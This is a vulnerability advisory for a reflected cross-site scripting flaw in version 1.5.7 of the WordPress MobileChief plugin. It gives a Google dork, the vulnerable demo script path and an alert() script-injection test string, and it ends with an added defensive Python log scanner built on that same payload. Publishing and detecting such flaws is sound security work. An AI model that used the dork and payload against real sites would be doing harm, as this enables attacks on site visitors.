WordPress MobileChief Mobile Site Builder plugin suffers from a cross site scripting vulnerability. Note that this advisory has site-specific information.
====================================================================
# Exploit Title : WordPress MobileChief - Mobile Site Builder plugin Cross site scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org
# Plugin Link : http://downloads.wordpress.org/plugin/mobilechief-mobile-site-creator.1.5.7.zip
# Version : 1.5.7
# Google Dork : inurl:wp-content/plugins/mobilechief-mobile-site-creator
# Date: 2013/10/26
# Tested on: Windows 7
#
------------------------------------------------
#
# Exploit :
#
# Location : http://site.com/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/[xss]
#
# Script For Test : "/><script>alert(1);</script>
#
------------------------------------------------
#
# Demo:
#
######################
discovered by : ACC3SS
######################
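
For defenders checking their own logs against the Location pattern above, the following is an added example, not part of the original advisory or the plugin's code. It flags requests to the bundled demo script and separates those whose trailing path info decodes to HTML markup characters; the combined access log format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Demo script path taken from the advisory's Location line.
DEMO_PATH = ("/wp-content/plugins/mobilechief-mobile-site-creator"
             "/lib/jquery-validate/demo/captcha/index.php")
DEMO_RE = re.compile(re.escape(DEMO_PATH), re.IGNORECASE)
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let path info break out of an HTML attribute or tag.
MARKUP_RE = re.compile(r'[<>"\']')


def _line(target):
    """Build one constructed log line (documentation IP, made-up sizes)."""
    return ('203.0.113.7 - - [26/Oct/2013:10:00:01 +0000] '
            f'"GET {target} HTTP/1.1" 200 512 "-" "-"')


# Constructed sample input; the first payload is the advisory's test string.
SAMPLE_LOG = [
    _line(DEMO_PATH + "/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E"),
    _line("/blog" + DEMO_PATH + "/%2522%253E%253Cb%253E"),  # double-encoded
    _line("/main" + DEMO_PATH),                             # plain demo hit
    _line("/wp-login.php"),                                 # unrelated
]


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(log_line):
    """Return 'markup-in-path-info', 'demo-exposed' or None for a log line."""
    request = REQUEST_RE.search(log_line)
    if not request:
        return None
    path = decode_fully(request.group(1).split("?", 1)[0])
    demo = DEMO_RE.search(path)
    if not demo:
        return None
    path_info = path[demo.end():]  # everything after index.php
    return "markup-in-path-info" if MARKUP_RE.search(path_info) else "demo-exposed"


def scan(lines):
    """Return (line_number, verdict) for every line that touches the demo."""
    return [(n, v) for n, v in enumerate(map(classify, lines), 1) if v]
```

A `demo-exposed` verdict means the bundled jquery-validate demo is being requested on the site even without a payload, which is worth reviewing on its own.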